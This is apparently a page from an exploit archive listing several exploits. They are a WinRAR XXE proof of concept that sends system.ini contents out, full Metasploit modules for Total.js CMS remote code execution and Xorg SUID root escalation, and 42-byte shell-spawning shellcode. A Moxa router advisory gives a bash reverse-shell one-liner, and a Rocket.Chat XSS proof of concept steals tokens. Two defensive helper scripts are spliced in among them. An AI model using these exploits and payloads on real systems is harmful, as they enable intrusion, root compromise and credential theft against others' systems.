Channel: Exploit Collector

WinRAR 5.80 XML Injection


WinRAR version 5.80 suffers from an XML external entity injection vulnerability.


MD5 | 0cb9d823c4de04451472377ab153a5a4


# Exploit Title: winrar External Entity Injection
# Exploit Author: albalawi-s
# Vendor Homepage: https://win-rar.com
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit

#https://twitter.com/test_app_______

#poc video

https://www.youtube.com/watch?v=XpFvSHeVB7E

# POC
=====================================================
1- python -m SimpleHTTPServer 8000
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the html file to the window


html file

<html>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>

==============================
start.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
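A defensive counterpart to the PoC above, added here and not part of the original advisory: a Python scanner that flags external (SYSTEM) entity declarations such as the two parameter entities in the payload, plus an expat-based parser that refuses any DOCTYPE and never resolves an external entity reference. SAMPLE_XXE and SAMPLE_CLEAN are constructed inputs.

```python
import re
import xml.parsers.expat

# Constructed sample: the inline DTD pattern used by the WinRAR PoC above
SAMPLE_XXE = """<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\\Windows\\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

# Constructed sample: a harmless document with no DTD at all
SAMPLE_CLEAN = '<?xml version="1.0"?><config><name>ok</name></config>'

# <!ENTITY [%] name SYSTEM "uri">  (general or parameter entity, external)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s+)?([A-Za-z_][\w.-]*)\s+SYSTEM\s+["\']([^"\']*)["\']')


def find_external_entities(doc):
    """Return (name, is_parameter_entity, uri) for every external entity
    declared in the document's internal DTD subset."""
    found = []
    for pct, name, uri in ENTITY_RE.findall(doc):
        found.append((name, bool(pct), uri))
    return found


class DoctypeRejected(Exception):
    """Raised when a document carries a DOCTYPE, which a parser that never
    needs DTDs should simply refuse."""


def safe_parse(doc):
    """Parse with expat, aborting on any DOCTYPE and never fetching external
    entities. Returns the element names seen, in document order."""
    seen = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised in a handler propagate out of Parse()
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    # Returning 0 tells expat to stop instead of resolving the reference
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(doc, True)
    return seen
```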


Total.js CMS 12 Widget JavaScript Code Injection


This Metasploit module exploits a vulnerability in Total.js CMS. The issue is that a user with admin permission can embed a malicious JavaScript payload in a widget, which is evaluated server side, and gain remote code execution.


MD5 | 1764c2113b6babdc9f9a58ffd2bc284f

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Total.js CMS 12 Widget JavaScript Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in Total.js CMS. The issue is that a user with
        admin permission can embed a malicious JavaScript payload in a widget, which is
        evaluated server side, and gain remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Riccardo Krauter', # Original discovery
          'sinn3r'            # Metasploit module
        ],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Targets'        =>
        [
          [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
          [ 'Total.js CMS on Mac',   { 'Platform' => 'osx',   'CmdStagerFlavor' => 'curl' } ]
        ],
      'References'     =>
        [
          ['CVE', '2019-15954'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
          ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8000,
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => '2019-08-30', # Reported to seclist
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
        OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
        OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
      ])
  end

  class AdminToken
    attr_reader :token

    def initialize(cookie)
      @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
    end

    def blank?
      token.blank?
    end
  end

  class Widget
    attr_reader :name
    attr_reader :category
    attr_reader :source_code
    attr_reader :platform
    attr_reader :url

    def initialize(p, u, stager)
      @name        = "p_#{Rex::Text.rand_text_alpha(10)}"
      @category    = 'content'
      @platform    = p
      @url         = u
      @source_code = %Q|<script total>|
      @source_code << %Q|global.process.mainModule.require('child_process')|
      @source_code << %Q|.exec("sleep 2;#{stager}");|
      @source_code << %Q|</script>|
    end
  end

  def check
    code = CheckCode::Safe

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'widgets')
    })

    unless res
      vprint_error('Connection timed out')
      return CheckCode::Unknown
    end

    # If the admin's login page is visited too many times, we will start getting
    # a 401 (unauthorized response). In that case, we only have a header to work
    # with.
    if res.headers['X-Powered-By'].to_s == 'Total.js'
      code = CheckCode::Detected
    end

    # If we are here, then that means we can still see the login page.
    # Let's see if we can extract a version.
    html = res.get_html_document
    element = html.at('title')
    return code unless element.respond_to?(:text)
    title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
    return code unless title
    version = Gem::Version.new(title)

    if version <= Gem::Version.new('12')
      # If we are able to check the version, we could try the default cred and attempt
      # to execute malicious code and see how the application responds. However, this
      # seems a bit too aggressive so I'll leave that to the exploit part.
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def auth(user, pass)
    json_body = { 'name' => user, 'password' => pass }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri, 'api', 'login', 'admin'),
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    json_res = res.get_json_document
    cookies = res.get_cookies
    # If it's an array it could be an error, so we are specifically looking for a hash.
    if json_res.kind_of?(Hash) && json_res['success']
      token = AdminToken.new(cookies)
      @admin_token = token
      return token
    end
    fail_with(Failure::NoAccess, 'Invalid username or password')
  end

  def create_widget(admin_token)
    platform = target.platform.names.first
    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
    port = datastore['SRVPORT']
    proto = datastore['SSL'] ? 'https' : 'http'
    payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
    url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
    widget = Widget.new(platform, url, generate_cmdstager(
      'Path' => "#{get_resource}/#{payload_name}",
      'temp' => '/tmp',
      'file' => payload_name
    ).join(';'))

    json_body = {
      'name'     => widget.name,
      'category' => widget.category,
      'body'     => widget.source_code
    }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget created successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end

    widget
  end

  def get_widget_item(admin_token, widget)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json'
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    count = res_json['count']
    items = res_json['items']

    unless count
      fail_with(Failure::Unknown, 'No count key found in body')
    end

    unless items
      fail_with(Failure::Unknown, 'No items key found in body')
    end

    items.each do |item|
      widget_name = item['name']
      if widget_name.match(/p_/)
        return item
      end
    end

    []
  end

  def clear_widget
    admin_token = get_admin_token
    widget = get_widget

    print_status('Finding the payload from the widget list...')
    item = get_widget_item(admin_token, widget)
    # get_widget_item returns an empty array when nothing matched; bail out
    # instead of indexing into it below
    fail_with(Failure::Unknown, 'Payload widget not found in widget list') if item.blank?

    json_body = {
      'id'          => item['id'],
      'picture'     => item['picture'],
      'name'        => item['name'],
      'icon'        => item['icon'],
      'category'    => item['category'],
      'datecreated' => item['datecreated'],
      'reference'   => item['reference']
    }.to_json

    res = send_request_cgi({
      'method' => 'DELETE',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget cleared successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end
  end

  def on_request_uri(cli, req)
    print_status("#{cli.peerhost} requesting: #{req.uri}")

    if req.uri =~ /p_.+/
      payload_exe = generate_payload_exe(code: payload.encoded)
      print_status("Sending payload to #{cli.peerhost}")
      send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
      return
    end

    send_not_found(cli)
  end

  def on_new_session(session)
    clear_widget
  end

  # This is kind of for cleaning up the widget, because we cannot pass it as an
  # argument in on_new_session.
  def get_widget
    @widget
  end

  # This is also kind of for cleaning up the widget, because we cannot pass it as an
  # argument directly
  def get_admin_token
    @admin_token
  end

  def exploit
    user = datastore['TOTALJSUSERNAME']
    pass = datastore['TOTALJSPASSWORD']
    print_status("Attempting to authenticate with #{user}:#{pass}")
    admin_token = auth(user, pass)
    fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
    print_good("Authenticated as: #{user}:#{pass}")
    print_status("Creating a widget...")
    @widget = create_widget(admin_token)
    super
  end

end

Linux/x86 execve(/bin/sh) Socket Reuse Shellcode


42 bytes small Linux/x86 execve(/bin/sh) socket reuse shellcode.


MD5 | 55ec03b4974039d4cf4ab3dec10344a5

# Exploit Name: Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
# Author : WangYihang
# Date: 2019-10-22
# Tested on: Linux_x86
# Shellcode Length: 42
# CVE: N/A
;================================================================================
# Shellcode (C) :
char shellcode[] = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
;================================================================================
# Shellcode (Python) :
shellcode = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
; Build :
; $ nasm -f elf32 shellcode.asm -o shellcode
; $ objdump -d shellcode

; shellcode: file format elf32-i386

; Disassembly of section .text:

; 00000000 <_start>:
;  0: 31 db                 xor    %ebx,%ebx
;  2: b3 03                 mov    $0x3,%bl
;  4: 31 c9                 xor    %ecx,%ecx
;  6: b1 03                 mov    $0x3,%cl

; 00000008 <dup2>:
;  8: fe c9                 dec    %cl
;  a: 31 c0                 xor    %eax,%eax
;  c: b0 3f                 mov    $0x3f,%al
;  e: cd 80                 int    $0x80
; 10: 80 f9 ff              cmp    $0xff,%cl
; 13: 75 f3                 jne    8 <dup2>

; 00000015 <execve>:
; 15: 31 c9                 xor    %ecx,%ecx
; 17: 6a 0b                 push   $0xb
; 19: 58                    pop    %eax
; 1a: 99                    cltd
; 1b: 52                    push   %edx
; 1c: 68 2f 2f 73 68        push   $0x68732f2f
; 21: 68 2f 62 69 6e        push   $0x6e69622f
; 26: 89 e3                 mov    %esp,%ebx
; 28: cd 80                 int    $0x80

;================================================================================
; Assembly language source code (shellcode.asm) :
global _start

_start:
    ; ebx = the already-open socket fd (assumed to be 3)
    xor ebx, ebx
    mov bl, 03H

    ; cl = loop counter, counts 2, 1, 0 over stderr, stdout, stdin
    xor ecx, ecx
    mov cl, 3

    ; dup2(socket, stderr)
    ; dup2(socket, stdout)
    ; dup2(socket, stdin)
dup2:
    dec cl
    xor eax, eax
    mov al, 3FH          ; sys_dup2
    int 80H
    cmp cl, 0FFH         ; cl wrapped below 0: all three fds done
    jne dup2

execve:
    ; execve("/bin//sh", NULL, NULL): ecx (argv) and edx (envp) are both 0
    xor ecx, ecx
    push 0bH             ; sys_execve
    pop eax
    cdq                  ; edx = 0 (eax is positive)
    push edx             ; NUL terminator for the path string
    push "//sh"
    push "/bin"
    mov ebx, esp         ; ebx -> "/bin//sh"
    int 80H

Xorg X11 Server SUID modulepath Privilege Escalation


This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. On successful exploitation artifacts will be created consistent with starting Xorg.


MD5 | d5e6f9fce10b890713038be1179ea1bd

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xorg X11 Server SUID modulepath Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges with SUID Xorg X11 server
        versions 1.19.0 < 1.20.3.

        A permission check flaw exists for -modulepath and -logfile options when
        starting Xorg. This allows unprivileged users that can start the server
        the ability to elevate privileges and run arbitrary code under root
        privileges.

        This module has been tested with CentOS 7 (1708).
        CentOS default install will require console auth for the users session.
        Xorg must have SUID permissions and may not start if running.

        On successful exploitation artifacts will be created consistent
        with starting Xorg.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Narendra Shinde', # Discovery and exploit
          'Aaron Ringo',     # Metasploit module
        ],
      'DisclosureDate' => 'Oct 25 2018',
      'References'     =>
        [
          [ 'CVE', '2018-14665' ],
          [ 'BID', '105741' ],
          [ 'EDB', '45697' ],
          [ 'EDB', '45742' ],
          [ 'EDB', '45832' ],
          [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]
        ],
      'Platform'       => %w[linux unix solaris],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => %w[shell meterpreter],
      'Targets'        =>
        [
          ['Linux x64', {
            'Platform' => 'linux',
            'Arch'     => ARCH_X64 } ],
          ['Linux x86', {
            'Platform' => 'linux',
            'Arch'     => ARCH_X86 } ],
          ['Solaris x86', {
            'Platform' => [ 'solaris', 'unix' ],
            'Arch'     => ARCH_SPARC } ],
          ['Solaris x64', {
            'Platform' => [ 'solaris', 'unix' ],
            'Arch'     => ARCH_SPARC } ],
        ],
      'DefaultTarget'  => 0))

    register_advanced_options(
      [
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
        OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),
        OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])
      ]
    )
  end

  def check
    # linux checks
    uname = cmd_exec "uname"
    if uname =~ /linux/i
      vprint_status "Running additional check for Linux"
      if datastore['ConsoleLock']
        user = cmd_exec "id -un"
        unless exist? "/var/run/console/#{user}"
          vprint_error "No console lock for #{user}"
          return CheckCode::Safe
        end
        vprint_good "Console lock for #{user}"
      end
    end

    # suid program check
    xorg_path = cmd_exec "command -v Xorg"
    unless xorg_path.include?("Xorg")
      vprint_error "Could not find Xorg executable"
      return CheckCode::Safe
    end
    vprint_good "Xorg path found at #{xorg_path}"
    unless setuid? xorg_path
      vprint_error "Xorg binary #{xorg_path} is not SUID"
      return CheckCode::Safe
    end
    vprint_good "Xorg binary #{xorg_path} is SUID"

    x_version = cmd_exec "Xorg -version"
    if x_version.include?("Release Date")
      v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
      unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
      vprint_warning "Could not parse Xorg -version output"
      return CheckCode::Appears
    end
    vprint_good "Xorg version #{v} is vulnerable"

    # process check for /X
    proc_list = cmd_exec "ps ax"
    if proc_list.include?('/X ')
      vprint_warning('Xorg in process list')
      return CheckCode::Appears
    end
    vprint_good('Xorg does not appear to be running')
    return CheckCode::Vulnerable
  end

  def check_arch_and_compile(path, data)
    cpu = ''
    if target['Arch'] == ARCH_X86
      cpu = Metasm::Ia32.new
      compile_with_metasm(cpu, path, data)
    elsif target['Arch'] == ARCH_SPARC
      compile_with_gcc(path, data)
    else
      cpu = Metasm::X86_64.new
      compile_with_metasm(cpu, path, data)
    end
  end

  def compile_with_metasm(cpu, path, data)
    shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)
    write_file(path, shared_obj)
    register_file_for_cleanup path

    chmod path
  rescue
    print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')
    compile_with_gcc(path, data)
  end

  def compile_with_gcc(path, data)
    unless has_gcc?
      fail_with Failure::BadConfig, 'gcc is not installed'
    end
    vprint_good 'gcc is installed'

    src_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c"
    write_file(src_path, data)

    gcc_cmd = "gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end
    output = cmd_exec gcc_cmd
    register_file_for_cleanup src_path
    register_file_for_cleanup path

    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{src_path} failed to compile"
    end

    chmod path
  end

  def exploit
    check_status = check
    if check_status == CheckCode::Appears
      print_warning 'Could not get version or Xorg process possibly running, may fail'
    elsif check_status == CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'This session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    print_good 'Passed all initial checks for exploit'

    modulepath = datastore['WritableDir']
    sofile = "#{modulepath}/#{datastore['sofile']}"
    pscript = "#{modulepath}/.session-#{rand_text_alphanumeric 5..10}"
    xdisplay = datastore['Xdisplay']

    stub = %Q^
      extern int setuid(int);
      extern int setgid(int);
      extern int system(const char *__s);

      void _init(void) __attribute__((constructor));

      void __attribute__((constructor)) _init() {
        setgid(0);
        setuid(0);
        system("#{pscript} &");
      }
    ^
    print_status 'Writing launcher and compiling'
    check_arch_and_compile(sofile, stub)

    # Uploading
    print_status 'Uploading your payload, this could take a while'
    if payload.arch.first == 'cmd'
      write_file(pscript, payload.encoded)
    else
      write_file(pscript, generate_payload_exe)
    end
    chmod pscript
    register_file_for_cleanup pscript

    # Actual exploit with cron overwrite
    print_status 'Exploiting'
    #Xorg -logfile derp -modulepath ',/tmp' :1
    xorg_cmd = "Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null"
    cmd_exec xorg_cmd
    Rex.sleep 7
    cmd_exec "pkill Xorg"
    Rex.sleep 1
  end
end

Moxa EDR-810 Command Injection / Information Disclosure


Moxa EDR-810 suffers from command injection and information disclosure vulnerabilities.


MD5 | 44aaabac61169cb9f8674a0c43a2cae6

During an engagement for a client, RandoriSec found two vulnerabilities in Moxa EDR-810 Series Secure Routers. The first is a command injection vulnerability in the CLI that allows an authenticated user to obtain root privileges. The second is an improper access control issue in the web server that allows log files to be retrieved.

As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to "responsibly disclose" them.

The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.

Many thanks to Moxa and ICS-CERT teams for their help.



Advisory

The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:

CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.
CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.


Exploitation

CVE-2019-10969 - Ping Command Injection

The Telnet and SSH services provide a Command Line Interface (CLI), a restricted shell that allows only a subset of actions on the device. The ping function of the CLI is vulnerable to command injection: supplying a crafted hostname such as ($/bin/bash) yields a shell, as shown below:

Ping command injection

Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1


CVE-2019-10963 - Missing Access Control On Log Files

When a legitimate user (admin or configadmin, for instance) exports the log files from the Moxa router, the files are stored at the root of the web server, as follows:

http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
An attacker can retrieve this archive without being authenticated on the Web interface as shown below:

# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz
Connexion à 192.168.0.1:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Taille : 15724 (15K) [text/plain]
Sauvegarde en : " MOXA_All_LOG.tar.gz "

MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s

2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]

# tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/
-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini
-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini
-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini


Mitigation

It is recommended to install at least firmware version 5.3 from the Moxa website.



Timeline

2019-02-24: Vendor Disclosure
2019-02-24: Advisory sent to ICS-CERT
2019-09-30: Advisory published by Moxa
2019-10-01: Advisory published by ICS-CERT

Rocket.Chat 2.1.0 Cross Site Scripting


Rocket.Chat version 2.1.0 suffers from a cross site scripting vulnerability.


MD5 | 426408e3c6927553e46c936cb22c498b

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. The token will be written to logs.txt once the target has seen your message.

IObit Uninstaller 9.1.0.8 IObitUnSvr Unquoted Service Path


IObit Uninstaller version 9.1.0.8 suffers from an IObitUnSvr unquoted service path vulnerability.


MD5 | 084f3207692cb64b3de2525e77497157

# Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
# Author: Sainadh Jamalpur
# Date: 2019-10-22
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version : 9.1.0.8
# Tested on: Windows 10 64bit(EN)
# CVE : N/A

# 1. Description:
# The IObitUnSvr service in IObit Uninstaller v9.1.0.8 is registered with an unquoted service path.

# PoC
===========
C:\>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IObitUnSvr
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IObit Uninstaller Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\>

#Exploit:
============
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
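An audit helper for the condition described above, added here and not part of the original advisory: it parses `sc qc`-style output, decides whether BINARY_PATH_NAME is an unquoted path containing spaces, lists the shorter executables Windows would try first (the locations whose write ACLs a defender should verify), and produces the quoted value the service should be reconfigured with. SC_QC_OUTPUT is a constructed copy of the advisory's output.

```python
import re

# Constructed sample: the `sc qc IObitUnSvr` output quoted in the advisory above
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IObitUnSvr
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\\Program Files (x86)\\IObit\\IObit Uninstaller\\IUService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IObit Uninstaller Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r'\s*([A-Z_]+)\s*:\s*(.*)$', line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def _image_head(path):
    """The part of the command line up to (not including) the first '.exe';
    arguments after the image name do not matter for this check."""
    end = path.lower().find('.exe')
    return path if end < 0 else path[:end]


def binary_path_is_unquoted(path):
    """True when the image path contains spaces and is not wrapped in quotes."""
    path = path.strip()
    if not path or path.startswith('"'):
        return False
    return ' ' in _image_head(path)


def candidate_executables(path):
    """Executables the service control manager may try before the intended one:
    each space in an unquoted path ends an earlier, shorter candidate."""
    parts = _image_head(path.strip()).split(' ')
    return [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]


def quote_binary_path(path):
    """The corrected value: the image path wrapped in double quotes,
    any trailing arguments left untouched."""
    path = path.strip()
    if not binary_path_is_unquoted(path):
        return path
    end = path.lower().find('.exe') + 4
    return '"' + path[:end] + '"' + path[end:]


def audit(text):
    """Audit one service's `sc qc` output."""
    f = parse_sc_qc(text)
    path = f.get('BINARY_PATH_NAME', '')
    unquoted = binary_path_is_unquoted(path)
    return {
        'service': f.get('SERVICE_NAME'),
        'account': f.get('SERVICE_START_NAME'),
        'unquoted': unquoted,
        'candidates': candidate_executables(path) if unquoted else [],
        'fixed_path': quote_binary_path(path),
    }
```

The fixed_path value is what `sc config <service> binPath=` should be set to; a path that runs as LocalSystem and whose candidates fall in a user-writable location is the case that matters.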

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

WordPress Sliced Invoices 3.8.2 Cross Site Scripting


WordPress Sliced Invoices plugin versions 3.8.2 and below suffer from a cross site scripting vulnerability.


MD5 | df9d4d1e2f545ded8d4d29f70c2d5267

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

1. Description:

The WordPress Sliced Invoices plugin with a version lower than 3.8.2 is affected by an authenticated Reflected Cross-site Scripting (XSS) vulnerability.

2. Proof of Concept:

Reflected Cross-site scripting (XSS)
- Using a WordPress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E
- The response will contain:
```
<body id="error-page">
<p>Creation failed, could not find original invoice or quote: <script>alert(1)</script></p></body>
</html>
```


